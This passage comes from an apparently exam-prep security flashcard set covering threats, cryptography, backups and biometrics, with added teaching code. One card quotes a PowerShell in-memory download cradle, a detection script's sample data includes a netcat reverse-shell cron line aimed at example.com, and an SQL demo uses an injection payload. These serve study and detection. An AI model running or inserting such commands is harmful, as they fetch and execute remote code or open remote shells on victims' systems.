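    if parts.path.startswith(BLOCKED_PATH_PREFIXES):
        return False, f"blocked path: {parts.path}"
    return True, "ok"

if __name__ == "__main__":
    for u in ("http://localhost/admin.php",
              "https://169.254.169.254/latest/meta-data/",
              "https://2130706433/",
              "https://partner-api.example.net/catalog/items?id=7"):
        print(u, "->", check_outbound_url(u))
```

Two caveats the check cannot cover on its own: the fetch must resolve the allowlisted name and connect only to the address that was checked (otherwise DNS rebinding re-opens the hole), and every HTTP redirect the fetch follows must be put back through the same check.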
70
Angela reviews bulletins and advisories to determine what threats her organization is likely to face. What type of activity is this associated with?
Incident Response
Threat Hunting
Vulnerability Scanning
Penetration testing

Threat Hunting
71
Threat Hunting
proactively searching for cyber threats that are lurking undetected in a network.
72
Chap 1-195: If Frank were still operating his on-site infrastructure, which of the following technologies would provide the most insight into what type of attack he was seeing?
Firewall
IPS
Vulnerability Scanner
Antimalware Software

IPS
73
Chap 1-196: Aliana wants to ensure that the on-site system integration that a vendor her company is working with is done in accordance with industry best practices. Which of the following is not a common method of ensuring this?
Inserting security requirements into contracts
Auditing configurations
Coordinating with the vendor for security reviews during and after installation
Requiring a SOC report

Requiring a SOC report. A SOC report attests to the controls of a service organization that hosts or processes data on your behalf; it says nothing about how a vendor performs an on-site integration.
74
Chap 1-202: Direct access, wireless, email, supply chain, social media, removable media, and cloud are all examples of what?
Threat Intelligence Sources
Threat Vectors
Attributes of threat actors
Vulnerabilities

Threat Vectors
75
Chap 1-205: Claire discovers the following PowerShell script. What does it do?
powershell.exe -ep Bypass -nop -noexit -c "iex ((New-Object Net.WebClient).DownloadString('https://example.com/file.ps1'))"
Downloads a file and opens a remote shell
Uploads a file and deletes the local copy
Downloads a file into memory
Uploads a file from memory

Downloads a file into memory. -ep Bypass skips the execution policy, -nop skips loading the user profile, -noexit keeps the session open, and iex (Invoke-Expression) executes the script text that DownloadString fetched, so the script runs without ever being written to disk.
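Added example (not from the original flashcard set) of the detection side of the two commands above: a small rule set run over cron entries and process command lines that flags netcat and /dev/tcp reverse shells, PowerShell execution-policy bypass and the in-memory download cradle, plus a helper that reads the cron schedule so "every minute" and "hourly" are not confused. The sample lines are constructed (the two malicious ones are copied from the cards, the benign ones are made up for contrast).

```python
import re

# Constructed sample lines: the cron entry and PowerShell cradle from the two cards above,
# plus two benign lines for contrast.
SAMPLE_LINES = [
    "0 * * * * nc example.com 8989 -e /bin/bash",
    "powershell.exe -ep Bypass -nop -noexit -c iex ((New-Object Net.WebClient).DownloadString('https://example.com/file.ps1'))",
    "*/5 * * * * /usr/bin/backup.sh --quiet",
    "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\scripts\\inventory.ps1",
]

RULES = [
    ("netcat reverse shell",
     re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s+/bin/(ba|z)?sh\b", re.I)),
    ("bash /dev/tcp reverse shell",
     re.compile(r"/dev/tcp/[^/\s]+/\d+")),
    ("powershell execution-policy bypass",
     re.compile(r"-(ep|ex\w*)\s+Bypass", re.I)),          # -ep Bypass, -exec Bypass, -ExecutionPolicy Bypass
    ("powershell in-memory download cradle",
     re.compile(r"(\biex\b|invoke-expression).*downloadstring|downloadstring.*(\biex\b|invoke-expression)", re.I)),
]

def match_indicators(line):
    """Names of every rule that fires on one command line or cron entry."""
    return [name for name, rx in RULES if rx.search(line)]

def cron_frequency(entry):
    """Describe the schedule of a crontab line ('m h dom mon dow command')."""
    minute, hour, dom, mon, dow = entry.split()[:5]
    if minute == "*":
        return "every minute"
    if minute.isdigit() and (hour, dom, mon, dow) == ("*", "*", "*", "*"):
        return f"hourly (at minute {minute})"
    return "other"

def triage(lines):
    """Return [(line, hits)] for the lines that matched at least one rule."""
    out = []
    for line in lines:
        hits = match_indicators(line)
        if hits:
            out.append((line, hits))
    return out

if __name__ == "__main__":
    for line, hits in triage(SAMPLE_LINES):
        print(hits, "<-", line)
    print(cron_frequency(SAMPLE_LINES[0]))
```

Regex indicators like these are cheap to evade (base64-encoded -EncodedCommand payloads, nc without -e piped through a FIFO), so they belong in front of, not instead of, command-line logging and outbound-connection monitoring; the unexpected hourly connection to port 8989 is what a network sensor would catch even if the cron line had been obfuscated.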
76
Charles finds a vulnerability in his PHP server via an OpenVAS scan. What should he do first to determine the best fix for the vulnerability?
Disable PHP-CGI
Upgrade to the latest version of PHP
Review the vulnerability descriptions in the CVEs listed
Disable the server

Review the vulnerability descriptions in the CVEs listed.
77
What is the SSH port?
TCP 22
78
What is the Telnet port?
TCP 23 (TCP 21 is FTP control)
79
Chap 2-2: You are responsible for network security at an e-commerce company. You want to ensure that you are using the best practices for the e-commerce website your company hosts. What standard would be best for you to review?
OWASP
NERC
Trusted Foundry
ISA/IEC

OWASP
80
OWASP
Open Web Application Security Project (renamed the Open Worldwide Application Security Project in 2023): the de facto standard for web application security
81
Chap 2-3: Cheryl is responsible for cyber-security at a mid-sized insurance company. She has decided to use a different vendor for network antimalware than she uses for host antimalware. Is this a recommended action, and why or why not?
This is not recommended; you should use a single vendor for a particular security control
This is recommended; this is described as vendor diversity
This is not recommended; this is described as vendor forking
It is neutral; this does not improve or detract from security

This is recommended; this is described as vendor diversity
82
Chap 2-8: Which of the following is not a critical characteristic of a hash function? It converts variable length input into a fixed length output Multiple inputs should not hash to the same output It must be reversible It should be fast to compute
It must be reversible
83
Chap 2-11: Trevor wants to use an inexpensive device to build a custom embedded system that can monitor a process. Which of the following options is best suited for this if he wants to minimize the expense and maximize simplicity while avoiding the potential for system or device compromise? Raspberry Pi custom FPGA Repurposed desktop PC Arduino
Arduino. It is the cheapest option, and because it is a microcontroller rather than a full computer running a general-purpose OS, it presents far less attack surface to compromise
84
Chap 2-12: Amanda wants to use a digital signature on an email she is sending to Maria. Which key should she use to sign the email? Maria's public key Amanda's public key Maria's private key Amanda's private key
Amanda's private key Digital signatures are created using the signer's private key, allowing it to be validated using their public key
85
Chap 2-14: Gurvinder knows that the OpenSSL passwd file protects passwords by using 1,000 rounds of MD5 hashing to help protect password information. What is this technique called? Spinning the hash Key rotation Key stretching Hash iteration
Key stretching
86
Key stretching
In cryptography, key stretching techniques are used to make a possibly weak key, typically a password or passphrase, more secure against a brute-force attack by increasing the resources (time and possibly space) it takes to test each possible key. One way is to repeatedly use a hash function or block cipher, increasing the effort that an attacker would need to exert to attack the resulting hashed or encrypted data
87
KDF
In cryptography, a key derivation function (KDF) is a cryptographic algorithm that derives one or more secret keys from a secret value such as a master key, a password, or a passphrase using a pseudorandom function (which typically uses a cryptographic hash function or block cipher).
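The two cards above (key stretching and KDF) in working code, as an added example that is not from the flashcards: PBKDF2-HMAC-SHA256 from the standard library is the KDF, the iteration count is the stretching, and a per-user salt defeats precomputed tables. The stored record format "pbkdf2_sha256$iterations$salt$hash" is this example's own convention.

```python
"""Key stretching with PBKDF2-HMAC-SHA256.

Added example, not from the flashcards. PBKDF2 is the KDF; the iteration
count is the stretching. The record format "pbkdf2_sha256$iters$salt$hash"
is this example's own convention.
"""
import hashlib
import hmac
import os
from typing import Optional

# OWASP's current recommendation for PBKDF2-HMAC-SHA256; lower it only for tests.
DEFAULT_ITERATIONS = 600_000


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = DEFAULT_ITERATIONS) -> str:
    """Derive a 32-byte key and store everything needed to re-derive it."""
    salt = os.urandom(16) if salt is None else salt   # per-user salt: same password, different hash
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Re-derive with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported record type {algo!r}")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations), dklen=32)
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


def needs_rehash(record: str, minimum_iterations: int = DEFAULT_ITERATIONS) -> bool:
    """Records stretched with fewer rounds than policy should be upgraded at next login."""
    _, iterations, _, _ = record.split("$")
    return int(iterations) < minimum_iterations


if __name__ == "__main__":
    rec = hash_password("correct horse battery staple")
    print(rec)
    print(verify_password("correct horse battery staple", rec), needs_rehash(rec))
```

The iteration count is stored with the hash so that it can be raised over time without breaking existing records: verify with the old count, then re-hash with the new one on a successful login.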
88
Chap 2-16: Ian wants to send an encrypted message to Michelle using public key cryptography. What key does he need to encrypt the message? His public key His private key Her public key Her private key
Her public key Ian will use Michelle's public key to encrypt the message so that only she can read it using her private key. If he wanted to sign the message, he could use his private key and Michelle could use his public key to validate his signature. Neither Ian nor Michelle should ever reveal their private keys.
89
Chap 2-17: What key advantage does an elliptic curve cryptosystem have over an RSA-based cryptosystem? It can use a smaller key length for the same resistance to being broken It requires only a single key to encrypt and decrypt It can run on older processors It can be used for digital signatures as well as encryption
It can use a smaller key length for the same resistance to being broken
90
ECC
Elliptic Curve Cryptography (ECC) is a public-key technique based on the algebraic structure of elliptic curves. ECC uses public/private key pairs for key exchange, encryption and digital signatures (for example in TLS). It is faster because it achieves security comparable to RSA with much shorter keys: per NIST SP 800-57, a 256-bit ECC key is roughly equivalent to a 3072-bit RSA key, and a 224-bit ECC key to a 2048-bit RSA key
91
Perfect Forward Secrecy
Perfect Forward Secrecy (PFS), also called forward secrecy (FS), is a property of key-agreement protocols in which each session uses a fresh, ephemeral key (for example ephemeral Diffie-Hellman) that is discarded afterwards. Because session keys are not derived from the server's long-term private key, a later compromise of that key does not allow previously recorded sessions to be decrypted, and compromise of one session key exposes only that session.
92
SCADA
SCADA is the acronym for Supervisory Control and Data Acquisition. SCADA is a computer-based system for gathering and analyzing real-time data to monitor and control equipment that deals with critical and time-sensitive materials or events. SCADA systems were first used in the 1960s and are now an integral component in virtually all industrial plant and production facilities. https://oleumtech.com/what-is-scada
93
What function does counter mode perform in a cryptographic system? It reverses the encryption process It turns a block cipher into a stream cipher It turns a steam cipher into a block cipher It allows public keys to unlock private keys
It turns a block cipher into a stream cipher
94
Block cipher
A block cipher encrypts data in fixed-size blocks (128 bits for AES, 64 bits for DES) using a cryptographic key and algorithm, processing one whole block at a time, as opposed to a stream cipher, which encrypts data bit by bit or byte by byte.
95
Stream cipher
A stream cipher is a symmetric encryption technique that combines the plaintext, bit by bit or byte by byte, with a pseudorandom keystream generated from the key (normally by XOR). Because the operation is symmetric, the same key and keystream both encrypt and decrypt. Its security depends on never reusing a keystream: two messages encrypted under the same key and nonce let an attacker XOR the ciphertexts together and cancel the keystream out.
96
Chap 2-27: Which of the following items is not included in a blockchain's public ledger A record of all genuine transactions between network participants A record of cryptocurrency balances (or other data) stored in the blockchain The identity of the blockchain participants A token that identifies the authority under which the transaction was made.
A token that identifies the authority under which the transaction was made.
97
Counter mode
Counter mode (CTR) turns a block cipher into a stream cipher: the cipher encrypts a nonce concatenated with an incrementing counter to produce keystream blocks, and the keystream is XORed with the plaintext. Because every block's keystream input is known in advance, blocks can be computed in parallel and data can be streamed instead of waiting for a full block. The nonce must never repeat under the same key.
98
Chap 2-29: Alexandria is preparing to run automated security tests against the code that developers in her organization have completed. Which environment is she most likely to run them in if the next step is to deploy code to production? Development Test Staging Production
Staging (sometimes called PreProduction)
99
Chap 2-31: Derek has been assigned to assess the security of smart meters. Which of the following is not a common concern for an embedded system like a smart meter? Eavesdroping Denial of Service Remote Disconnection SQL injection
SQL injection, because they typically don't include a SQL server
100
Chap 2-32: Selah wants to analyze real world attack patterns against systems similar to what she already has deployed in her organization. She would like to see local commands on a compromised system and have access to any tools or other materials the attackers would normally deploy. What type of technology could she use to do this? A honeypot An IPS An IDS A WAF
Honeypot
101
FDE
Full Disk Encryption
102
NIPS
Network Intrusion Prevention System: A network-based intrusion prevention system (NIPS) is a system used to monitor a network as well as protect the confidentiality, integrity, and availability of a network. Its main functions include protecting the network from threats, such as denial of service (DoS) and unauthorized usage.
103
Chap 2-34: Maria is a security engineer with a manufacturing company. During a recent investigation she discovered that an engineer's compromised workstation was being used to connect to SCADA systems while the engineer was not logged in. The engineer is responsible for administering the SCADA systems and cannot be blocked from connecting to them. What should Maria do to mitigate this threat? Install host based antivirus software on the engineer's system Implement account usage auditing on the SCADA system Implement an NIPS on the SCADA Use FDE on the engineer's system
Implement account usage auditing on the SCADA system
104
Chap 2-35: AES and DES are an example of what type of cipher? Stream ciphers that encrypt groups of plain-text symbols all together. Block ciphers that encrypt groups of plain-text symbols all together. Stream ciphers that encrypt one plain-text symbol at a time. Block ciphers that encrypt one plain-text symbol at a time.
Block ciphers that encrypt groups of plain-text symbols all together.
105
AES
The Advanced Encryption Standard (AES), also known by its original name Rijndael is a specification for the encryption of electronic data established by the U.S. National Institute of Standards and Technology (NIST) in 2001 AES is a variant of the Rijndael block cipher developed by two Belgian cryptographers, Joan Daemen and Vincent Rijmen. Rijndael is a family of ciphers with different key and block sizes. Block size = 128 bits Key lengths = 128, 192 and 256 bits.
106
DES
The Data Encryption Standard is a symmetric-key algorithm for the encryption of digital data. Although its short key length of 56 bits makes it too insecure for modern applications, it has been highly influential in the advancement of cryptography. Block cipher Key sizes = 56 bits Block sizes = 64 bits
107
Chap 2-37: What purpose does a transit gateway serve in Cloud Services? It connects systems inside of a cloud data center It connects VPCs and on-premise data centers It provides an API gateway between trust zones It allows multicloud infrastructure designs
It connects VPCs and on-premise data centers
108
Transit Gateway Service
A transit hub used to connect VPCs (Virtual Private Clouds) to each other and to an on-premises data center
109
Chap 2-38: Web developers in your company currently have direct access to the production server and can deploy code directly to it. This can lead to unsecure code or simply code flaws being deployed to the live system. What would be the best change you could make to mitigate this risk? Implement Sandboxing Implement Virtualized Servers Implement a Staging Server Implement deployment policies
Implement a Staging Server
110
Chap 2-39: Ian is concerned about VoIP phones used in his organization due to the use of SMS as part of their multifactor authentication rollout. What type of attack should he be concerned about? A vishing attack A voicemail hijack An SMS token redirect A weak multifactor code injection
An SMS token redirect
111
Chap 2-45: Chris sets a resource policy in his cloud environment. What type of control does this allow him to exert? It allows him to determine how much disk space can be used It allows him to determine how much bandwidth can be used It allows him to specify who has access to resources and what actions they can perform on it It allows him to specify what actions a resource can take on specific users
It allows him to specify who has access to resources and what actions they can perform on it
112
Chap 2-46: Chris sets up SAN replication for his organization. What has he done? He has enabled RAID 1 to ensure that the SAN cannot lose data if a drive fails because the drives are replicated He has set up backups to a tape library for the SAN to ensure data resilience He has built a second identical set of hardware for his SAN He has replicated the data on one SAN to another at the block or hardware level
He has replicated the data on one SAN to another at the block or hardware level
113
RAID 5
Disk striping with distributed parity
114
RAID 0
Disk striping
115
RAID 1
Disk Mirroring
116
RAID 3
Disk striping with dedicated parity
117
EMI
electromagnetic interference
118
Normalization
process of removing duplication or redundant data from a database
119
RAID 1+0
aka RAID 10: mirrored data set (RAID 1) which is then striped (RAID 0)
120
RAID 6
disk striping with dual parity (distributed)
121
Chap 2-58 Where does TLS/SSL inspection happen, and how does it occur? On the client using a proxy On the server, using a protocol analyzer At the certificate authority by validating a request for a TLS certificate Between the client and the server by intercepting encrypted communications
Between the client and the server by intercepting encrypted communications. TLS interception devices act as an on-path attack: they decrypt traffic to scan and analyze it for malware or other signs of attacks, then re-encrypt it to send to its destination. The technique has both legitimate and illegitimate uses
122
VM Sprawl
Virtualization sprawl is a phenomenon that occurs when the number of virtual machines (VMs) on a network reaches a point where administrators can no longer manage them effectively. Virtualization sprawl is also referred to as virtual machine sprawl, VM sprawl or virtual server sprawl.
123
VM escape
Situation where an attacker breaks out of a VM and interacts directly with the hypervisor, and potentially the host OS or other guest VMs
124
DNS Sinkhole
A DNS server that returns a false, non-routable or defender-controlled address for known malicious domain names, so that clients (including malware) cannot reach the real host and the lookup attempts can be logged
125
Chap 2-59: Diana wants to prevent drones from flying over her organization's property. What can she do? Deploy an automated take down system that will shoot the drones down. Deploy radio frequency jammers to disrupt the drone's control frequencies Contact the FAA to get her company's property listed as a no-fly zone None of the above
None of the above. None of them is practical: shooting drones down is illegal destruction of property; jamming is also illegal under FCC rules; and the FAA rarely grants no-fly zones for private property
126
Chap 2-61: You are responsible for database security at your company. You are concerned that programmers might pass badly written SQL commands to the database., or that an attacker might exploit badly written SQL in applications. What is the best way to mitigate this threat? Formal code inspection Programming policies Agile programming Stored procedures
Stored procedures
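The problem the card describes, shown concretely as an added example that is not from the flashcards. SQLite has no stored procedures, so the hardened version uses a parameterized statement, which gives the same separation of fixed SQL text from user-supplied data that a parameterized stored procedure provides. The table, rows and attacker payload are constructed.

```python
"""Concatenated SQL versus parameterized SQL, shown against SQLite.

Added example, not from the flashcards. SQLite has no stored procedures, so
the hardened version uses a parameterized statement, which gives the same
separation of fixed SQL text from user-supplied data. The table, rows and
payload are constructed.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL, role TEXT NOT NULL)"
    )
    con.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return con


def find_user_vulnerable(con: sqlite3.Connection, username: str) -> list:
    """Badly written SQL: the input becomes part of the statement text."""
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return con.execute(sql).fetchall()


def find_user_safe(con: sqlite3.Connection, username: str) -> list:
    """The statement is fixed; the driver binds the value, so quotes in it are just data."""
    return con.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


# Constructed attacker input: closes the string literal and appends a tautology.
INJECTION_PAYLOAD = "nobody' OR '1'='1"


if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", find_user_vulnerable(con, INJECTION_PAYLOAD))
    print("safe:      ", find_user_safe(con, INJECTION_PAYLOAD))
```

With the payload, the vulnerable query becomes `... WHERE username = 'nobody' OR '1'='1'` and returns every row; the parameterized query looks for a user literally named `nobody' OR '1'='1` and returns nothing.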
127
Chap 2-62: Joanna's company has adopted multiple SaaS tools and now wants to better coordinate them so the data that they each contain can be used in multiple services. What type of solution should she recommend if she wants to minimize the complexity of long term maintenance for her organization? Replace the SaaS service with a PaaS environment to move everything to a single platform Build API based integrations using in-house expertise Adopt an integration platform to leverage scalability Build flat file integrations using in-house expertise
Adopt an integration platform to leverage scalability
128
Chap 2-70: Gerald is concerned about unauthorized people entering the company's building. Which of the following would be most effective in preventing this? Alarm Systems Fencing Cameras Security Guards
Security Guards
129
Chap 2-71: Which of the following is the most important benefit from using an SDN? It will stop malware It provides scalability It will detect intrusions It will prevent session hijacking
It provides scalability
130
SDN
Software Defined Networking; makes the network very scalable
131
Chap 2-72: Mark is an administrator for a health company. He has to support an older, legacy application. He is concerned that this legacy application might have vulnerabilities that would affect the rest of the network. What is the most efficient way to mitigate this? Use an application container Implement an SDN Run the application on a separate VLAN Insist on an updated version of the application
Run the application on a separate VLAN
132
Chap 2-74: Valerie is considering deploying a cloud access security broker. What sort of tool is she looking at? A system that implements mandatory access control on cloud infrastructure A tool that sits between cloud users and applications to monitor activity and enforce policies A tool that sits between cloud application providers and customers to enforce web application security policies A system that implements discretionary access control on cloud infrastructure
A tool that sits between cloud users and applications to monitor activity and enforce policies
133
Cloud Access Security Broker (CASB)
Used to monitor cloud activity and usage and to enforce security policies on users of cloud services. According to Gartner, a cloud access security broker (CASB) is an on-premises or cloud-based security policy enforcement point that is placed between cloud service consumers and cloud service providers to combine and interject enterprise security policies as cloud-based resources are accessed. Think of the CASB as the sheriff that enforces the laws set by the cloud service administrators.
134
Chap 2-85: What term is used to describe encryption that can permit computations to be conducted on ciphertext, with the results matching what would have occurred if the same computations were performed on the original plain text? Identity preserving encryption Homomorphic encryption Replicable encryption None of the above
Homomorphic encryption
135
Homomorphic encryption
Homomorphic encryption is the conversion of data into ciphertext that can be analyzed and worked with as if it were still in its original form. Homomorphic encryption enables complex mathematical operations to be performed on encrypted data without compromising the encryption.
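A worked instance of the property described above, added here and not part of the flashcards: the Paillier cryptosystem is additively homomorphic, so multiplying two ciphertexts yields an encryption of the sum of the plaintexts, and raising a ciphertext to a power multiplies the plaintext by that constant. The primes P and Q are deliberately tiny so the arithmetic is readable; real keys use primes of 1024 bits or more, and the code does no input validation.

```python
"""Additively homomorphic encryption (Paillier), worked with small primes.

Added example, not from the flashcards. P and Q are illustration-sized
primes, not a secure key; real deployments use primes of 1024 bits or more.
"""
import math
import secrets

P, Q = 1000003, 1000037   # small primes for readability only


def keygen(p: int = P, q: int = Q):
    """Public key (n, g); private key (n, lambda, mu). Uses the common choice g = n + 1."""
    n = p * q
    lam = (p - 1) * (q - 1) // math.gcd(p - 1, q - 1)   # lcm(p - 1, q - 1)
    g = n + 1
    mu = pow(lam, -1, n)   # with g = n + 1, L(g^lam mod n^2) == lam mod n, so mu = lam^-1 mod n
    return (n, g), (n, lam, mu)


def encrypt(pub, m: int) -> int:
    """c = g^m * r^n mod n^2 with fresh random r, so equal plaintexts give different ciphertexts."""
    n, g = pub
    n2 = n * n
    while True:
        r = secrets.randbelow(n - 1) + 1
        if math.gcd(r, n) == 1:
            break
    return pow(g, m, n2) * pow(r, n, n2) % n2


def decrypt(priv, c: int) -> int:
    """m = L(c^lam mod n^2) * mu mod n, where L(u) = (u - 1) / n."""
    n, lam, mu = priv
    n2 = n * n
    l_value = (pow(c, lam, n2) - 1) // n
    return l_value * mu % n


def add_encrypted(pub, c1: int, c2: int) -> int:
    """Multiplying ciphertexts adds the plaintexts: Dec(c1 * c2) == m1 + m2 (mod n)."""
    n, _ = pub
    return c1 * c2 % (n * n)


def scale_encrypted(pub, c: int, k: int) -> int:
    """Raising a ciphertext to k multiplies the plaintext by k: Dec(c^k) == k * m (mod n)."""
    n, _ = pub
    return pow(c, k, n * n)


if __name__ == "__main__":
    pub, priv = keygen()
    ca, cb = encrypt(pub, 1234), encrypt(pub, 4321)
    print(decrypt(priv, add_encrypted(pub, ca, cb)))    # 5555, computed without decrypting ca or cb
    print(decrypt(priv, scale_encrypted(pub, ca, 7)))   # 8638
```

The party doing the arithmetic (a cloud service, say) holds only the public key and the ciphertexts; it never sees 1234 or 4321, yet the owner of the private key recovers the correct sum. Results are reduced modulo n, so the plaintext space must be sized to keep sums in range.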
136
SoC
System on a Chip, self contained system on a single chip
137
SED
Self Encrypting Drive
138
RFC
Request for Comments; RFC documents contain technical specifications and organizational notes for the Internet A Request for Comments (RFC) is a publication in a series from the principal technical development and standards-setting bodies for the Internet, most prominently the Internet Engineering Task Force (IETF). An RFC is authored by individuals or groups of engineers and computer scientists in the form of a memorandum describing methods, behaviors, research, or innovations applicable to the working of the Internet and Internet-connected systems. It is submitted either for peer review or to convey new concepts, information, or, occasionally, engineering humor.
139
Chap 2-95: Using standard naming conventions provides a number of advantages. Which of the following is not an advantage of using a naming convention? It can help administrators determine the function of a system It can help administrators identify misconfigured or rogue systems It can help conceal a system from an attacker It can make scripting easier
It can help conceal a system from an attacker
140
Gait Analysis
Gait analysis is an assessment of the way the body moves, usually by walking or running, from one place to another.
141
Community Cloud
Compromise solution; Community clouds are semi-private; not accessible to general public, but only to a small community of specific entities. The cloud infrastructure is provisioned for exclusive use by a specific community of consumers from organizations that have shared concerns (e.g., mission, security requirements, policy, and compliance considerations). It may be owned, managed, and operated by one or more of the organizations in the community, a third party, or some combination of them, and it may exist on or off premises.
142
Chap 2-98: Your company is interested in keeping data in the cloud. Management feels that public clouds are not secure but is concerned about the cost of a private cloud. What is the solution you would recommend? Tell them there no risks in the public cloud Tell them they will have to find a way to budget for a private cloud Suggest that they consider a community cloud Recommend against a cloud solution at this time
Suggest that they consider a community cloud
143
Chap 2-101: Madhuri has configured a backup that will back up all of the changes to a system since the last time that a full backup occurred. What type of backup has she set up? A snapshot A full backup An incremental backup A differential
A differential
144
Incremental Backup
Backs up all changes since last incremental backup
145
Differential Backup
backs up all changes since last full backup
146
Chap 1-103: What is the point where false acceptance rate and false rejection rate cross over in a biometric system? CRE FRE CER FRR
CER - crossover error rate
147
CER - Crossover Error Rate
point where the FAR and FRR cross over
148
FAR - False acceptance Rate
the percentage of identification instances in which unauthorized persons are incorrectly accepted. False acceptance (a false positive) is a Type II error; in most security contexts it is the worse of the two because it lets an impostor in
149
FRR - False rejection Rate
the percentage of identification instances in which authorized persons are incorrectly rejected. False rejection (a false negative) is a Type I error
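How FAR, FRR and the crossover point are actually computed from matcher scores, as an added example that is not from the flashcards. The two score lists are constructed: each value is a matcher's similarity score for one attempt, genuine attempts by enrolled users and impostor attempts by everyone else, and an attempt is accepted when its score is at or above the threshold.

```python
"""FAR, FRR and the crossover (equal error) rate from matcher scores.

Added example, not from the flashcards. The score lists are constructed:
each value is a matcher's similarity score for one attempt. An attempt is
accepted when its score is at or above the threshold.
"""
from typing import List, Optional, Tuple

GENUINE_SCORES = [0.91, 0.88, 0.85, 0.82, 0.80, 0.78, 0.75, 0.72, 0.69, 0.60]
IMPOSTOR_SCORES = [0.20, 0.25, 0.30, 0.38, 0.45, 0.52, 0.58, 0.63, 0.70, 0.76]


def far(threshold: float, impostor: List[float] = IMPOSTOR_SCORES) -> float:
    """Fraction of impostor attempts that are (wrongly) accepted."""
    return sum(s >= threshold for s in impostor) / len(impostor)


def frr(threshold: float, genuine: List[float] = GENUINE_SCORES) -> float:
    """Fraction of genuine attempts that are (wrongly) rejected."""
    return sum(s < threshold for s in genuine) / len(genuine)


def crossover(genuine=GENUINE_SCORES, impostor=IMPOSTOR_SCORES) -> Tuple[float, float, float]:
    """Threshold where FAR and FRR are closest; the error rate there is the CER/EER."""
    candidates = sorted(set(genuine) | set(impostor))
    best = min(candidates, key=lambda t: (abs(far(t, impostor) - frr(t, genuine)), t))
    return best, far(best, impostor), frr(best, genuine)


def threshold_for_max_far(max_far: float, genuine=GENUINE_SCORES,
                          impostor=IMPOSTOR_SCORES) -> Optional[Tuple[float, float, float]]:
    """Lowest threshold whose FAR is within budget, and the FRR users will pay for it.

    Raising the threshold drives FAR down and FRR up, which is the trade-off a
    high-security deployment makes when FAR is its biggest concern.
    """
    for t in sorted(set(genuine) | set(impostor)):
        if far(t, impostor) <= max_far:
            return t, far(t, impostor), frr(t, genuine)
    return None


if __name__ == "__main__":
    print("crossover (threshold, FAR, FRR):", crossover())
    print("zero-FAR setting:", threshold_for_max_far(0.0))
```

With the constructed scores the curves cross at a threshold of 0.70, where 20% of impostors get in and 20% of legitimate users are turned away; pushing FAR to zero requires a threshold of 0.78 and rejects 40% of genuine attempts.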
150
MSSP
Managed Security Service Provider
151
Chap 2-114: Gordon knows that regression testing is important but wants to prevent old versions of code from being re-inserted into new releases. What process should he use to prevent this? Continuous Integration Version Numbering Continuous Deployment Release Management
Version Numbering
152
Chap 2-115: Mia a network administrator for a bank. She is responsible for secure communications with her company's website. Which of the following would be the best for her to implement? SSL PPTP IPSec TLS
TLS
153
PPTP
Point-to-Point Tunneling Protocol; PPTP is an obsolete method for implementing virtual private networks. PPTP has many well-known security issues.
154
IPSec
IPSec is a set of communication rules or protocols for setting up secure connections over a network. Internet Protocol (IP) is the common standard that determines how data travels over the internet. IPSec adds encryption and authentication to make the protocol more secure. Used in VPN
155
Chap 2-116: Which of the following is not a common challenge with smartcard-based authentication systems? Weaker security due to the limitations of the smartcard's encryption support Added expense due to card readers, distribution and software installation Weaker user experience due to the requirement to insert the card for every authentication Lack of security due to possession of the card being the only factor used
Weaker security due to the limitations of the smartcard's encryption support Smartcards support modern cryptographic standards, meaning weak security due to a smartcard's limitations on encryption is not an issue
156
XaaS
Anything as a Service
157
MOU
memorandum of understanding. - a document that describes the broad outlines of an agreement that two or more parties have reached.
158
TOTP
Time Based One Time Password (Authy, Google Authenticator)
159
HOTP
The "H" in HOTP stands for HMAC (Hash-based Message Authentication Code). HOTP (HMAC-based One-Time Password, RFC 4226) is an event-based OTP: the moving factor is a counter that is incremented each time a code is generated and validated. The code that is generated stays valid until a new one is requested and validated by the authentication server, at which point the generator and the server are resynchronized. Yubico's YubiKey is an example of an OTP generator that uses HOTP.
160
Chap 2-123: The company that Nina works for has suffered from recent thefts of packages from a low security delivery area. What type of camera capability can they use to ensure that a recently delivered package is properly monitored? Infrared image capture Motion detection Object detection Facial detection
Object detection
161
Chap 2-124: Which of the following is not a common organizational security concern for wearable devices? A GPS location data exposure Data exposure User health data exposure Insecure wireless connectivity
User health data exposure
162
Chap 1-126: You are working for a large company. You are trying to find a solution that will provide controlled physical access to the building and record every employee who enters the building. Which of the following would be the best for you to implement? A security guard with a sign in sheet Smartcard access using electronic locks A camera by the entrance A sign-in sheet by the front door
Smartcard access using electronic locks
163
NIC Teaming
Network Interface Card (NIC) teaming is a common technique of grouping physical network adapters to improve performance and redundancy (aka fault tolerance)
164
Chap 2-131: Molly is implementing biometrics in her company. Which of the following should be her biggest concern? FAR FRR CER EER
FAR
165
EER
Equal Error Rate, same as Crossover Error Rate; point where FAR and FRR crossover
166
Chap 2-132: Mike is concerned about data sovereignty for data that his organization captures and maintains. What best describes his concern? Who owns the data that is captured on systems hosted in a cloud provider's infrastructure? Can Mike's organization make decisions about data that is part of its service, or does it belong to users? Is the data located in a country subject to the laws of the country where it is stored? Does data have rights on its own, or does the owner of the data determine what rights may apply to it?
Is the data located in a country subject to the laws of the country where it is stored?
167
Chap 1-133: What are the key limiting factors for cryptography on low-power devices? There are system limitations on CPU, memory and storage The devices cannot support public key encryption due to an inability to factor prime numbers There is a lack of chipset support for encryption Legal limitations for low power devices prevent encryption from being supported
There are system limitations on CPU, memory and storage
168
